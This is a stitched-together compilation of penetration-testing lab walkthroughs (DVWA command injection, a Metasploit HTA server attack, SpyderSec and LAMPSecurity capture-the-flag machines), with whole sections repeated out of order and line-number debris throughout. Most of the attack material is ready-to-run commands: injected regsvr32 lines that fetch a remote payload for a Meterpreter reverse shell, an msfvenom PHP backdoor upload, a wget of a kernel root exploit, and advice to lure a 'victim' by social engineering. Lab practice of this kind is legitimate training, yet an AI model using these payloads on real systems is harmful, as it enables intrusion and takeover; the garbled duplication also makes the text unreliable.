Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
Go to the command execution page Enter an IP address and click on submit.
[size=small]192.168.1.100 && dir
1
192.168.1.100 && dir[/size]
We have found 4 directories and a file and also that path of the directory.
Next command is 192.168.1.100 && net user click on submit,
[size=small]msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit
1
2
3
4
5
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit[/size]
[size=small]192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
1
192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll[/size]
sysinfo to get system information.
Bypass Medium Level Security
Click on DVWA Security and set Website Security Level Medium
Use pipe in command injection to bypass medium security of this server.
[size=small]192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
1
192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll[/size]
Again we got meterpreter session 2
Bypass High Level Security
Click on DVWA Security and set Website Security Level High
||
[size=small]192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
1
192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll[/size]
Yes, we have got meterpreter session 3!!
Finally we have completed all three level low, medium, high in DVWA.
[size=small]use exploit/windows/misc/hta_server
msf exploit (hta_server)>set lhost 192.168.0.104
msf exploit (hta_server)>set srvhost 192.168.0.104
msf exploit (hta_server)>set payload windows/meterpreter/reverse_tcp
msf exploit (hta_server)>set lport 8443
msf exploit (hta_server)>exploit
1
2
3
4
5
6
use exploit/windows/misc/hta_server
msf exploit (hta_server)>set lhost 192.168.0.104
msf exploit (hta_server)>set srvhost 192.168.0.104
msf exploit (hta_server)>set payload windows/meterpreter/reverse_tcp
msf exploit (hta_server)>set lport 8443
msf exploit (hta_server)>exploit[/size]
Challenge: You are looking for two flags. Using discovered pointers in various elements of the running web application you can deduce the first flag (a downloadable file) which is required to find the second flag (a text file). Look, read and maybe even listen. You will need to use basic web application recon skills as well as some forensics to find both flags.
You can download it from here: https://www.vulnhub.com/entry/spydersec-challenge,128/
Level: Intermediate
Penetrating Methodologies:
[size=small]netdiscover
1
netdiscover[/size]
Our target is 192.168.1.101. Scan the target with nmap.
[size=small]nmap -A 192.168.1.101
1
nmap -A 192.168.1.101[/size]
There are only two ports open i.e. 22 and 80 for SSH and HTTPS respectively. Next, I opened this page in the browser.
[size=small]exiftool Challenge.png
1
exiftool Challenge.png[/size]
If you observe closely the comment is in hexadecimal form. We need to convert it into a readable form. No third party tool is required just go online to hex to Ascii converter copy the string and paste it in the text box and then click the convert button.
This time we got base 64 encode and to decode it we use the following command.
[size=small]echo 'bas64 text' |base64 -d
1
echo 'bas64 text' |base64 -d[/size]
Now finally we have a readable string. This can be a password or a directory. Note it down for future use.
Moving on if you go through the source code of the home web page you will find that evil function is quite unusual.
After unpacking you will again come face to face with a hexadecimal string. Convert this string just like before.
I explored a lot and search a lot but found nothing about it so decided to capture its cookies through BurpSuite.
Now when I opened it there was an error. Then I explored a d bit and remembered that there was a mulder.fbi so I added that to the link.
After adding mulder.fbi to the link it asked me to download a file. Save it.
When you open the file that you just saved then it will play a video with different quotes. Now I was clueless about this so I started searching about it on Google. And I found out that it was a TrueCrypt file. So to see what is hidden type:
[size=small]python tcsteg.py mulder.fbi
1
python tcsteg.py mulder.fbi[/size]
There was a whole drive hidden behind it. And using veracrypt you can see and open the drive.
When you open it will ask for a password and we have found the password beforehand. So give the password there.
Hence the drive will be unlocked. Now open the drive. And you will find a flag there.
The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises too.
These exercises can be used for training purposes by following this documentation. Alternatively, you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.
Download from Here.
Penetration Testing Methodology
Network Scanning
The first step to attack is to identify the target. So, to identify the target, we will use the following command:
[size=small]netdiscover
1
netdiscover[/size]
Now we will use nmap to gain information about the open ports and the services running on the target machine using the following command
[size=small]nmap -sV -sT -p- 192.168.43.30
1
nmap -sV -sT -p- 192.168.43.30[/size]
Enumeration
http://192.168.43.30
[size=small]dirb http://192.168.43.30
1
dirb http://192.168.43.30[/size]
We found two major directories i.e. /files/ and /sql/. We can tell from their names that are quite important.
http://192.168.43.30/files/
On exploring the files/ directory there multiple valid and useful files we found with a lot of information as you can see in the image below:
http://192.168.43.30/sql/db.sql/
Upon traversing through sql/ directory, we found a db.sql and when opened it gave us all the information about the database including username and password just as shown in the image below:
As we can add a new event, so, here we will create a backdoor using msfvenom first and then we will upload this shell.php file on the website. To create the shell type:
[size=small]msfvenom -p php/meterpreter/reverse_tcp -o /root/Music/shell.php lport=4444 lhost=192.168.43.248
1
msfvenom -p php/meterpreter/reverse_tcp -o /root/Music/shell.php lport=4444 lhost=192.168.43.248[/size]
After this, upload the shell by adding a new event as shown in the image below:
Finally, we have uploaded a malicious file. Now we will use msfconsole or we can also use netcat to get a session in order to perform more operations to gain root access.
[size=small]msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.248
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit
1
2
3
4
5
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.248
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit[/size]
[size=small]sysinfo
1
sysinfo[/size]
Kernel version is 2.6.18-92.el5 .
We have to search a lot to know more about this kernel version and after doing a lot of research we find out that this kernel version is vulnerable to udev exploit.
Now, we will use a script to gain root access, script name is 8478.sh, we can find this exploit/code in our Kali Linux OS.
[size=small]cp /usr/share/exploitdb/exploits/linux/local/8478.sh /root/Music
cd /root/Music/
ls -l
1
2
3
cp /usr/share/exploitdb/exploits/linux/local/8478.sh /root/Music
cd /root/Music/
ls -l[/size]
[size=small]python -m SimpleHTTPServer
1
python -m SimpleHTTPServer[/size]
[size=small]sysinfo
1
sysinfo[/size]
[size=small]python -c 'import pty; pty.spawn("/bin/bash")'
1
python -c 'import pty; pty.spawn("/bin/bash")'[/size]
[size=small]cd /tmp
pwd
1
2
cd /tmp
pwd[/size]
Now we have to download 8478.sh file here so that we can exploit the system. We can download the file using wget command:
[size=small]wget http://192.168.43.248:8000/8478.sh -q
1
wget http://192.168.43.248:8000/8478.sh -q[/size]
Now change the permissions to executable using the chmod command:
[size=small]ls
chmod +x 8478.sh
1
2
ls
chmod +x 8478.sh[/size]
[size=small]./8478.sh
1
./8478.sh[/size]
Many of us will get this error. We will search for this error and finally, we have found a solution to this error we can resolve this issue using the following command:
[size=small]sed -i -e 's/\r$//' 8478.sh
1
sed -i -e 's/\r$//' 8478.sh[/size]
Try again to run the script using:
[size=small]./8478.sh
1
./8478.sh[/size]
The reason behind this error is, it requires some experimentation as you have to provide the proper PID to the script in order for the code to work. So now we have to find a proper PID and with the help of that PID, we will run the script. To get the PID run the following command:
[size=small]cat /proc/net/netlink
1
cat /proc/net/netlink[/size]
Run the script again using the PID 376 using the command below:
[size=small]./8478.sh 376
whoami
1
2
./8478.sh 376
whoami[/size]
Boom! We have gained the root access!
[size=small]passwd root
id
su john
su -l
ls
1
2
3
4
5
passwd root
id
su john
su -l
ls[/size]
This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:
First install the DVWA in your PC full article read here
Now open the DVWA in your pc and login with following credentials:
Username
Password
Bypass Low Level Security
Click on DVWA Security and set Website Security Level low
Use in command injection to bypass low security of this server.
Now you can see the reply that tells us that we have establish a connection with the server. I have tried this numerous times just to be sure and so can you, therefore, whenever you will execute this cammand you will see the following :
We can also implement multiple commands simultaneously just by using & sign. For example next command is :
[size=small]192.168.1.100 && dir
1
192.168.1.100 && dir[/size]
After the above command click on submit, performing the said command will itemize all directories and files.
Next command is 192.168.1.100 && net user click on submit,
Various commands are available which when submitted will give the intended outcome. So firstly, we will find a way to transfer our malevolent payload to the remote machine and for that I am using my favorite tool metasploit. To use metasploit al you have to do is type msfconsole in kali terminal and then type the following commands
[size=small]msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit
1
2
3
4
5
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit[/size]
We can use the following command in order to open a port on the remote host and to connect back to it with metasploit.
[size=small]192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
1
192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll[/size]
and click on submit
sysinfo to get system information.
Bypass Medium Level Security
Click on DVWA Security and set Website Security Level Medium
Use pipe in command injection to bypass medium security of this server.
Follow same process as above using metasploit and further type :
[size=small]192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
1
192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll[/size]
Bypass High Level Security
Click on DVWA Security and set Website Security Level High
||
Follow same process as above using metasploit
[size=small]192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
1
192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll[/size]
and click on submit
Finally we have completed all three level low, medium, high in DVWA.
This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed
Exploit Targets
Windows All Versions
Requirement
Attacker: Kali Linux
Victim PC: Windows 10
Open Kali terminal type msfconsole
[size=small]use exploit/windows/misc/hta_server
msf exploit (hta_server)>set lhost 192.168.0.104
msf exploit (hta_server)>set srvhost 192.168.0.104
msf exploit (hta_server)>set payload windows/meterpreter/reverse_tcp
msf exploit (hta_server)>set lport 8443
msf exploit (hta_server)>exploit
1
2
3
4
5
6
use exploit/windows/misc/hta_server
msf exploit (hta_server)>set lhost 192.168.0.104
msf exploit (hta_server)>set srvhost 192.168.0.104
msf exploit (hta_server)>set payload windows/meterpreter/reverse_tcp
msf exploit (hta_server)>set lport 8443
msf exploit (hta_server)>exploit[/size]
Send the link of the server to the victim via chat or email or any social engineering technique.
When Victim Machine browsing to your link it will download anything.hta file when victim click on it you will get the meterpreter session
Sessions -lsessions -i ID
Challenge: You are looking for two flags. Using discovered pointers in various elements of the running web application you can deduce the first flag (a downloadable file) which is required to find the second flag (a text file). Look, read and maybe even listen. You will need to use basic web application recon skills as well as some forensics to find both flags.
You can download it from here: https://www.vulnhub.com/entry/spydersec-challenge,128/
Level: Intermediate
Penetrating Methodologies:
- Network Scanning (Netdiscover, Nmap)
- Extracting Metadata (ExifTool)
- Decoding Hex to Ascii
- Exploit eval function using javascript unpackage.
- Capture HTTP request (Burpsuit)
- Decode the URI to get them under.fbi file
- Unlock the hidden drive (veracrypt)
- Capture the Flag.
[size=small]netdiscover
1
netdiscover[/size]
Our target is 192.168.1.101. Scan the target with nmap.
[size=small]nmap -A 192.168.1.101
1
nmap -A 192.168.1.101[/size]
There are only two ports open i.e. 22 and 80 for SSH and HTTPS respectively. Next, I opened this page in the browser.
[size=small]exiftool Challenge.png
1
exiftool Challenge.png[/size]
If you observe closely the comment is in hexadecimal form. We need to convert it into a readable form. No third party tool is required just go online to hex to Ascii converter copy the string and paste it in the text box and then click the convert button.
This time we got base 64 encode and to decode it we use the following command.
[size=small]echo 'bas64 text' |base64 -d
1
echo 'bas64 text' |base64 -d[/size]
Now finally we have a readable string. This can be a password or a directory. Note it down for future use.
Moving on if you go through the source code of the home web page you will find that evil function is quite unusual.
After unpacking you will again come face to face with a hexadecimal string. Convert this string just like before.
I explored a lot and search a lot but found nothing about it so decided to capture its cookies through BurpSuite.
Now when I opened it there was an error. Then I explored a d bit and remembered that there was a mulder.fbi so I added that to the link.
After adding mulder.fbi to the link it asked me to download a file. Save it.
When you open the file that you just saved then it will play a video with different quotes. Now I was clueless about this so I started searching about it on Google. And I found out that it was a TrueCrypt file. So to see what is hidden type:
[size=small]python tcsteg.py mulder.fbi
1
python tcsteg.py mulder.fbi[/size]
There was a whole drive hidden behind it. And using veracrypt you can see and open the drive.
When you open it will ask for a password and we have found the password beforehand. So give the password there.
Hence the drive will be unlocked. Now open the drive. And you will find a flag there.
The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises too.
These exercises can be used for training purposes by following this documentation. Alternatively, you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.
Download from Here.
Penetration Testing Methodology
- Network Scanning
- netdiscover
- nmap port scan
- Enumeration
- Performing Directory Bruteforce
- Exploring directories to find out the username and password
- Exploiting
- Using a backdoor
- Using netcat/msfconsole
- Privilege Escalation
- Changing the password of root and other users
Network Scanning
The first step to attack is to identify the target. So, to identify the target, we will use the following command:
[size=small]netdiscover
1
netdiscover[/size]
Now we will use nmap to gain information about the open ports and the services running on the target machine using the following command
[size=small]nmap -sV -sT -p- 192.168.43.30
1
nmap -sV -sT -p- 192.168.43.30[/size]
Enumeration
http://192.168.43.30
[size=small]dirb http://192.168.43.30
1
dirb http://192.168.43.30[/size]
We found two major directories i.e. /files/ and /sql/. We can tell from their names that are quite important.
http://192.168.43.30/files/
On exploring the files/ directory there multiple valid and useful files we found with a lot of information as you can see in the image below:
http://192.168.43.30/sql/db.sql/
Upon traversing through sql/ directory, we found a db.sql and when opened it gave us all the information about the database including username and password just as shown in the image below:
As we can add a new event, so, here we will create a backdoor using msfvenom first and then we will upload this shell.php file on the website. To create the shell type:
[size=small]msfvenom -p php/meterpreter/reverse_tcp -o /root/Music/shell.php lport=4444 lhost=192.168.43.248
1
msfvenom -p php/meterpreter/reverse_tcp -o /root/Music/shell.php lport=4444 lhost=192.168.43.248[/size]
After this, upload the shell by adding a new event as shown in the image below:
Finally, we have uploaded a malicious file. Now we will use msfconsole or we can also use netcat to get a session in order to perform more operations to gain root access.
[size=small]msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.248
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit
1
2
3
4
5
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.248
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit[/size]
[size=small]sysinfo
1
sysinfo[/size]
Kernel version is 2.6.18-92.el5 .
We have to search a lot to know more about this kernel version and after doing a lot of research we find out that this kernel version is vulnerable to udev exploit.
Now, we will use a script to gain root access, script name is 8478.sh, we can find this exploit/code in our Kali Linux OS.
[size=small]cp /usr/share/exploitdb/exploits/linux/local/8478.sh /root/Music
cd /root/Music/
ls -l
1
2
3
cp /usr/share/exploitdb/exploits/linux/local/8478.sh /root/Music
cd /root/Music/
ls -l[/size]
[size=small]python -m SimpleHTTPServer
1
python -m SimpleHTTPServer[/size]
[size=small]sysinfo
1
sysinfo[/size]
[size=small]python -c 'import pty; pty.spawn("/bin/bash")'
1
python -c 'import pty; pty.spawn("/bin/bash")'[/size]
[size=small]cd /tmp
pwd
1
2
cd /tmp
pwd[/size]
Now we have to download 8478.sh file here so that we can exploit the system. We can download the file using wget command:
[size=small]wget http://192.168.43.248:8000/8478.sh -q
1
wget http://192.168.43.248:8000/8478.sh -q[/size]
Now change the permissions to executable using the chmod command:
[size=small]ls
chmod +x 8478.sh
1
2
ls
chmod +x 8478.sh[/size]
[size=small]./8478.sh
1
./8478.sh[/size]
Many of us will get this error. We will search for this error and finally, we have found a solution to this error we can resolve this issue using the following command:
[size=small]sed -i -e 's/\r$//' 8478.sh
1
sed -i -e 's/\r$//' 8478.sh[/size]
Try again to run the script using:
[size=small]./8478.sh
1
./8478.sh[/size]
The reason behind this error is, it requires some experimentation as you have to provide the proper PID to the script in order for the code to work. So now we have to find a proper PID and with the help of that PID, we will run the script. To get the PID run the following command:
[size=small]cat /proc/net/netlink
1
cat /proc/net/netlink[/size]
Run the script again using the PID 376 using the command below:
[size=small]./8478.sh 376
whoami
1
2
./8478.sh 376
whoami[/size]
Boom! We have gained the root access!
[size=small]passwd root
id
su john
su -l
ls
1
2
3
4
5
passwd root
id
su john
su -l
ls[/size]
